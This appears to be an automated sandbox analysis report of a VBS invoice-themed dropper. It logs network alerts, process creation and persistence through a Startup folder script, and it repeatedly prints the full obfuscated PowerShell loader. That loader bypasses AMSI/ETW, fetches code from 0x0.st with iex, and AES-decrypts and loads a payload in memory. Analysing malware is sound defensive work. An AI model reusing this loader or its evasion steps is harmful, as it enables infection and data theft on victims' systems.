Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49710 -> 168.119.145.117:443
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49705 -> 168.119.145.117:443
Source: global traffic | HTTP traffic detected: GET /8ZDa.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 0x0.st Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /8ZDa.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 0x0.st Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /8ZDa.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 0x0.st Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /8ZDa.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 0x0.st Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: 0x0.st
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: powershell.exe, 00000008.00000002.1451631801.0000000004882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.0000000004805000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1451631801.00000000048B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1451631801.00000000048A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49712 version: TLS 1.2

System Summary

barindex
Source: Commercial Invoice Confirmation-1132346.vbsStatic file information: Suspicious name
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: Commercial Invoice Confirmation-1132346.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2509
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2566
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2509Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2566Jump to behavior
Source: classification engineClassification label: mal100.spyw.expl.evad.winVBS@25/14@3/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmdJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_03
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 P
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{GUID="1DA87E53-152B-403E-98DC-74D7B4D63D59"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion = '5.1'CLRVersion="4.0"CmdletsToExport= "Format-List", "Format-Custom", "Format-Table", "Format-Wide", "Out-File", "Out-Printer", "Out-String", "Out-GridView", "Get-FormatData", "Export-FormatData", "ConvertFrom-Json", "ConvertTo-Json", "Invoke-RestMethod", "Invoke-WebRequest", "Register-ObjectEvent", "Register-EngineEvent", "Wait-Event", "Get-Event", "Remove-Event", "Get-EventSubscriber", "Unregister-Event", "New-Event", "Add-Member", "Add-Type", "Compare-Object", "ConvertTo-Html", "ConvertFrom-StringData", "Export-Csv", "Import-Csv", "ConvertTo-Csv", "ConvertFrom-Csv", "Export-Alias", "Invoke-Expression", "Get-Alias", "Get-Culture", "Get-Date", "Get-Host", "Get-Member", "Get-Random", "Get-UICulture", "Get-Unique", "Export-PSSession", "Import-PSSession", "Import-Alias", "Import-LocalizedData", "Select-String", "Measure-Object", "New-Alias", "New-TimeSpan", "Read-Host", "Set-Alias", "Set-Date", "Start-Sleep", "Tee-Object", "Measure-Command", "Update-List", "Update-TypeData", "Update-FormatData", "Remove-TypeData", "Get-TypeData", "Write-Host", "Write-Progress", "New-Object", "Select-Object", "Group-Object", "Sort-Object", "Get-Variable", "New-Variable", "Set-Variable", "Remove-Variable", "Clear-Variable", "Export-Clixml", "Import-Clixml", 
"ConvertTo-Xml", "Select-Xml", "Write-Debug", "Write-Verbose", "Write-Warning", "Write-Error", "Write-Information", "Write-Output", "Set-PSBreakpoint", "Get-PSBreakpoint", "Remove-PSBreakpoint", "Enable-PSBreakpoint", "Disable-PSBreakpoint", "Get-PSCallStack", "Send-MailMessage", "Get-TraceSource", "Set-TraceSource", "Trace-Command", "Show-Command", "Unblock-File", "Get-Runspace", "Debug-Runspace", "Enable-RunspaceDebug", "Disable-RunspaceDebug", "Get-RunspaceDebug", "Wait-Debugger", "ConvertFrom-String", "Convert-String"FunctionsToExport= "Get-FileHash", "New-TemporaryFile", "New-Guid", "Format-Hex", "Import-PowerShellDataFile", "ConvertFrom-SddlString"AliasesToExport= "CFS", "fhx"NestedModules="Microsoft.PowerShell.Commands.Utility.dll","Microsoft.PowerShell.Utility.psm1"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390787'CompatiblePSEditions = @('Desktop')}function Get-FileHash{ [CmdletBinding(DefaultParameterSetName = "Path", HelpURI = "https://go.microsoft.com/fwlink/?LinkId=517145")] param( [Parameter(Man
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Commercial Invoice Confirmation-1132346.vbsVirustotal: Detection: 13%
Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function 
decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function 
SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function 
decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd"
